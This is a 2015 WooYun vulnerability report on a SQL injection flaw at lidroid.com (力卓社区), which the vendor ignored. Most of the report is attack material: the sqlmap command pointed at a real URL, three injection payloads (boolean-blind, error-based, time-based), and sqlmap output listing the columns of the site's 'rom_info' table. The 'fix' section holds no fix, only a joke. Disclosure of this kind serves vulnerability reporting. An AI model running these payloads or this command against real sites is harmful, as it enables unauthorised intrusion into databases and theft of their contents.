当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0148130

漏洞标题:力卓sql注射

相关厂商:力卓社区

漏洞作者: 路人甲

提交时间:2015-10-20 18:46

修复时间:2015-10-25 18:48

公开时间:2015-10-25 18:48

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-10-20: 细节已通知厂商并且等待厂商处理中
2015-10-25: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

RT

详细说明:

sql注射:
sqlmap.py -u "http://lidroid.com/article?id=107"

1.jpg

漏洞证明:

do you want sqlmap to try to detect backend WAF/IPS/IDS? [y/N]
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=107 AND 4916=4916
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY cl
ause
Payload: id=107 AND (SELECT 7211 FROM(SELECT COUNT(*),CONCAT(0x7170707871,(S
ELECT (ELT(7211=7211,1))),0x716a626a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEM
A.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: id=107 AND (SELECT * FROM (SELECT(SLEEP(5)))RrAK)
---
[18:21:15] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.4.44, Nginx
back-end DBMS: MySQL 5.0
[18:21:15] [WARNING] missing database parameter. sqlmap is going to use the curr
ent database to enumerate table(s) columns
[18:21:15] [INFO] fetching current database
[18:21:15] [INFO] resumed: www
[18:21:15] [INFO] fetching columns for table 'rom_info' in database 'www'
[18:21:15] [WARNING] reflective value(s) found and filtering out
[18:21:15] [INFO] the SQL query used returns 14 entries
[18:21:17] [INFO] retrieved: id
[18:21:17] [INFO] retrieved: int(11)
[18:21:17] [INFO] retrieved: device_id
[18:21:18] [INFO] retrieved: int(11)
[18:21:18] [INFO] retrieved: ui_type_id
[18:21:18] [INFO] retrieved: int(11)
[18:21:18] [INFO] retrieved: user_id
[18:21:18] [INFO] retrieved: int(11)
[18:21:18] [INFO] retrieved: title
[18:21:18] [INFO] retrieved: varchar(256)
[18:21:18] [INFO] retrieved: android_version
[18:21:18] [INFO] retrieved: varchar(256)
[18:21:19] [INFO] retrieved: version
[18:21:19] [INFO] retrieved: varchar(256)
[18:21:19] [INFO] retrieved: md5
[18:21:19] [INFO] retrieved: varchar(256)
[18:21:19] [INFO] retrieved: size
[18:21:20] [INFO] retrieved: int(11)
[18:21:23] [INFO] retrieved: introduction
[18:21:23] [INFO] retrieved: text
[18:21:23] [INFO] retrieved: tips
[18:21:23] [INFO] retrieved: text
[18:21:23] [INFO] retrieved: update_time
[18:21:24] [INFO] retrieved: datetime
[18:21:24] [INFO] retrieved: download_times
[18:21:45] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is go
ing to retry the request
[18:21:46] [INFO] retrieved: int(11)
[18:21:46] [INFO] retrieved: show_order
[18:21:47] [INFO] retrieved: int(11)
Database: www
Table: rom_info
[14 columns]
+-----------------+--------------+
| Column | Type |
+-----------------+--------------+
| size | int(11) |
| version | varchar(256) |
| android_version | varchar(256) |
| device_id | int(11) |
| download_times | int(11) |
| id | int(11) |
| introduction | text |
| md5 | varchar(256) |
| show_order | int(11) |
| tips | text |
| title | varchar(256) |
| ui_type_id | int(11) |
| update_time | datetime |
| user_id | int(11) |
+-----------------+--------------+

修复方案:

我是来找礼物的!

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-10-25 18:48

厂商回复:

漏洞Rank:4 (WooYun评价)

最新状态:

暂无